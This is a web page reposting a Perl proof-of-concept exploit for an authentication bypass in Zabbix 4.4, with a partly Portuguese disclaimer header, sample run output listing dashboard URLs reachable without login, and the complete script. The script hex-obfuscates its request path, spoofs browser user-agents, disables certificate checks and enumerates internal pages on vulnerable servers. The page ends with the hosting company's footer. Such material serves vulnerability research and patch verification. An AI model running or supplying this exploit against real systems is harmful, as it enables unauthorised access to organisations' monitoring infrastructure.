fbpx

Zabbix 4.4 – Authentication Bypass

Zabbix 4.4 – Authentication Bypass

# Exploit Title: Zabbix 4.4 – Ignorar autenticação
# Data: 2019-10-06
# Exploit Autor: Todor Donev
# Link do software: https://www.zabbix.com/download
# Versão: Zabbix 4.4
# Testado em: Linux Apache / 2 PHP / 7.2

#
# Zabbix <= 4.4 Exploração de PoC de demonstração de desvio de autenticação
#
# Direitos autorais 2019 (c) Todor Donev
#
# Aviso Legal:
# Este ou os programas anteriores são APENAS para fins educacionais. Não use sem permissão.
# A isenção de responsabilidade usual se aplica, especialmente o fato de Todor Donev não ser responsável por nenhum dano
# causado pelo uso direto ou indireto das informações ou funcionalidades fornecidas por esses programas.
# O autor ou qualquer provedor de Internet NÃO se responsabiliza pelo conteúdo ou uso indevido desses programas
# ou seus derivados. Ao usar esses programas, você aceita o fato de que qualquer dano (dataloss,
(falha no sistema, comprometimento do sistema etc.) causados ​​pelo uso desses programas não são de Todor Donev
# responsabilidade.
#
# Use-os por sua conta e risco!
#
# (Não faça nada sem permissões)

#
#	#  [ Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit
#	#  [ Exploit Author: Todor Donev 2019 <[email protected]>
#	#  [ Initializing the browser
#	#  [ >>> Referer => 
#	#  [ >>> User-Agent => Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1
#	#  [ >>> Content-Type => application/x-www-form-urlencoded
#	#  [ <<< Cache-Control => no-store, no-cache, must-revalidate
#	#  [ <<< Connection => close
#	#  [ <<< Date => Mon, 07 Oct 2019 12:29:54 GMT
#	#  [ <<< Pragma => no-cache
#	#  [ <<< Server => nginx
#	#  [ <<< Vary => Accept-Encoding
#	#  [ <<< Content-Type => text/html; charset=UTF-8
#	#  [ <<< Expires => Thu, 19 Nov 1981 08:52:00 GMT
#	#  [ <<< Client-Date => Mon, 07 Oct 2019 12:29:54 GMT
#	#  [ <<< Client-Peer => 
#	#  [ <<< Client-Response-Num => 1
#	#  [ <<< Client-SSL-Cert-Issuer => 
#	#  [ <<< Client-SSL-Cert-Subject => 
#	#  [ <<< Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256
#	#  [ <<< Client-SSL-Socket-Class => IO::Socket::SSL
#	#  [ <<< Client-SSL-Warning => Peer certificate not verified
#	#  [ <<< Client-Transfer-Encoding => chunked
#	#  [ <<< Link => <favicon.ico>; rel="icon"<assets/img/apple-touch-icon-76x76-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="76x76"<assets/img/apple-touch-icon-120x120-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="120x120"<assets/img/apple-touch-icon-152x152-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="152x152"<assets/img/apple-touch-icon-180x180-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="180x180"<assets/img/touch-icon-192x192.png>; rel="icon"; sizes="192x192"<assets/styles/dark-theme.css>; rel="stylesheet"; type="text/css"
#	#  [ <<< Set-Cookie => zbx_sessionid=e125efe43b1f67b0fdbfb4db2fa1ce0d; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnly
#	#  [ <<< Strict-Transport-Security => max-age=63072000; includeSubdomains; preload
#	#  [ <<< Title => TARGET: Dashboard
#	#  [ <<< X-Content-Type-Options => nosniff
#	#  [ <<< X-Frame-Options => SAMEORIGIN
#	#  [ <<< X-Meta-Author => Zabbix SIA
#	#  [ <<< X-Meta-Charset => utf-8
#	#  [ <<< X-Meta-Csrf-Token => fdbfb4db2fa1ce0d
#	#  [ <<< X-Meta-Msapplication-Config => none
#	#  [ <<< X-Meta-Msapplication-TileColor => #d40000
#	#  [ <<< X-Meta-Msapplication-TileImage => assets/img/ms-tile-144x144.png
#	#  [ <<< X-Meta-Viewport => width=device-width, initial-scale=1
#	#  [ <<< X-UA-Compatible => IE=Edge
#	#  [ <<< X-XSS-Protection => 1; mode=block
#	#  [
#	#  [ The target is vulnerable. Try to open these links:
#	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view
#	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1
#	#  [ https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1
#	#  [ https://TARGET/zabbix/overview.php?ddreset=1
#	#  [ https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1
#	#  [ https://TARGET/zabbix/latest.php?ddreset=1
#	#  [ https://TARGET/zabbix/charts.php?ddreset=1
#	#  [ https://TARGET/zabbix/screens.php?ddreset=1
#	#  [ https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1
#	#  [ https://TARGET/zabbix/srv_status.php?ddreset=1
#	#  [ https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1
#	#  [ https://TARGET/zabbix/hostinventories.php?ddreset=1
#	#  [ https://TARGET/zabbix/report2.php?ddreset=1
#	#  [ https://TARGET/zabbix/toptriggers.php?ddreset=1
#	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.list
#	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
# 

#!/usr/bin/perl -w

use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
my $host = shift || ''; # Full path url to the store
$host =~ s|/$||;
print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit\n";
print "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
   $browser->timeout(30);
   $browser->agent($user_agent);
my $target = $host."\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);                      
my $response = $browser->request($request);
print "[ >>> $_ => ", $request->header($_), "\n" for  $request->header_field_names;
print "[ <<< $_ => ", $response->header($_), "\n" for  $response->header_field_names;
print "[ Exploit failed! 401 Unauthorized!\n" and exit if ($response->code eq '401');
print "[ Exploit failed! 403 Forbidden!\n" and exit if ($response->code eq '403');
if (defined ($response->as_string()) && ($response->as_string() =~ m/Dashboard/)){
    print "[\n[ The target is vulnerable. Try to open these links:\n";
    my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
    my @files = $tree->look_down(_tag => 'a');
    for my $line (@files){
        next if ($line->attr('href') =~ m/javascript/);
        next if ($line->attr('href') =~ m/\#/);
        next if ($line->attr('href') =~ m/http/);
        print "[ ", $host."/zabbix/".$line->attr('href'), "\n";
    }
} else { 
        print "[ Exploit failed! The target isn't vulnerable\n";
        exit;
}
11 de novembro de 2019

Sobre nós

A Linux Force Brasil é uma empresa que ama a arte de ensinar. Nossa missão é criar talentos para a área de tecnologia e atender com excelência nossos clientes.

CNPJ: 13.299.207/0001-50
SAC:         0800 721 7901

Comercial  Comercial: (11) 3796-5900

Suporte:    (11) 3796-5900

Copyright © Linux Force Security  - Desde 2011.